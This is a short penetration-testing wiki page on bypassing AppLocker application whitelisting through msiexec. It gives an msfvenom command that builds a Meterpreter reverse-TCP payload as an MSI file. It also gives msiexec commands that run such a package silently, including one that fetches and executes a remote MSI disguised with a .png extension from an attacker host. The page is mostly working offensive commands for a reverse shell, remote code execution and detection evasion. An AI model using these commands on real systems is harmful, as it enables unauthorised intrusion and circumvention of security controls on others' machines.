Skip to content

Application Whitelisting Bypass

Jump to bottom
netbiosX edited this page Jun 16, 2017 · 3 revisions

Application Whitelisting Bypasses

TODO

MSIEXEC

MSIEXEC is a Microsoft utility which can be used to install applications. If MSI files are not blocked by AppLocker then it can allow an attacker to bypass AppLocker executable rules.

Metasploit MSFVenom can be used to generate MSI files that contain a Meterpreter payload:

msfvenon -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.100.3 LPORT=4444 -f msi > pentestlab.msi

MSI - Meterpreter Payload

Execution of the MSI file on the target system will return a Meterpreter session:

MSIEXEC - Meterpreter

Msiexec utility has the ability to execute MSI files either locally or remotely. Additionally MSI files that have been renamed to PNG to avoid detection can be also executed normally and have the same results.

msiexec /quiet /i cmd.msi

msiexec /q /i http://192.168.100.3/tmp/cmd.png

If command prompt is locked then MSIEXEC can be executed from Windows Run:

Clone this wiki locally